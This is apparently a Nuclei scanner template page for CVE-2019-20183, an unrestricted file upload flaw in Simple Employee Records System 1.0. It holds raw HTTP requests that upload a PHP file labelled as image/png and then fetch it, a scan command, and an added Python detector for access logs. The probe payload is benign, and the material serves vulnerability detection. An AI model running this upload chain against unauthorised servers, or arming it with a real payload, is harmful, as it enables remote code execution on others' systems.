Simple Employee Records System 1.0 - Unrestricted File Upload
ID: CVE-2019-20183
Severity: high
Author: pikpikcu,j4vaovo
Tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project
Description
Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
YAML Source
id: CVE-2019-20183

info:
  name: Simple Employee Records System 1.0 - Unrestricted File Upload
  author: pikpikcu,j4vaovo
  severity: high
  description: |
    Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to the system, remote code execution, and potential compromise of sensitive data.
  remediation: |
    Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49596
    - https://medium.com/@Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20183
    - https://medium.com/%40Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-20183
    cwe-id: CWE-434
    epss-score: 0.03815
    epss-percentile: 0.91874
    cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: employee_records_system_project
    product: employee_records_system
  tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project

http:
  - raw:
      - |
        POST /dashboard/uploadID.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337

        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
        Content-Type: image/png

        <?php echo md5('CVE-2019-20183'); unlink(__FILE__); ?>
        -----------------------------5825462663702204104870787337--
      - |
        GET /uploads/employees_ids/{{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "1ad0d710225c472cb7396b3c1d97e4dd"

    extractors:
      - type: regex
        name: endpoint
        regex:
          - '(?:[a-zA-Z0-9+\/])*_poc.php'
        internal: true
        part: body
# digest: 4a0a00473045022000c60e3b4c59af24494f726636d19f36aa8521fbb1dbd9bdea8979cb30a6e959022100dfe8f38497cf225e346349452a4d4e98c1f026602057611bea4aa4a035b8c670:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-20183.yaml"
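
The template's request chain (a POST to /dashboard/uploadID.php, then a GET of the stored script under /uploads/employees_ids/) is visible in web-server access logs, and because the probe file removes itself with unlink(__FILE__), those logs may be the only trace left on the host. The following is an added example, not part of the template or the Nuclei project: a Python log check that assumes combined-format access logs, a five-minute correlation window and a chosen set of script extensions; the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined format); addresses and names are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "POST /dashboard/uploadID.php HTTP/1.1" 200 61 "-" "curl/8.0"
203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /uploads/employees_ids/Ab12Cd_poc.php HTTP/1.1" 200 32 "-" "curl/8.0"
198.51.100.4 - - [12/Mar/2024:10:20:00 +0000] "POST /dashboard/uploadID.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2024:10:20:03 +0000] "GET /uploads/employees_ids/Zx9_badge.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Mar/2024:11:00:00 +0000] "GET /uploads/employees_ids/old_shell.phtml HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_PATH = "/dashboard/uploadID.php"      # upload endpoint from the template
UPLOAD_DIR = "/uploads/employees_ids/"       # storage directory from the template
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)  # assumption: handler-mapped extensions
WINDOW = timedelta(minutes=5)                # assumption: correlation window

def find_upload_then_execute(log_text):
    """Return (level, client, path, status) for script requests in the upload directory."""
    last_upload = {}  # client IP -> time of its most recent upload POST
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, url, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = url.split("?", 1)[0]
        if method == "POST" and path == UPLOAD_PATH:
            last_upload[ip] = when
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            # A script name in an image upload directory always merits review;
            # a 200 shortly after an upload from the same client is high confidence.
            prior = last_upload.get(ip)
            chained = prior is not None and when - prior <= WINDOW
            level = "high" if chained and status == "200" else "review"
            findings.append((level, ip, path, status))
    return findings

if __name__ == "__main__":
    for finding in find_upload_then_execute(SAMPLE_LOG):
        print(finding)
```
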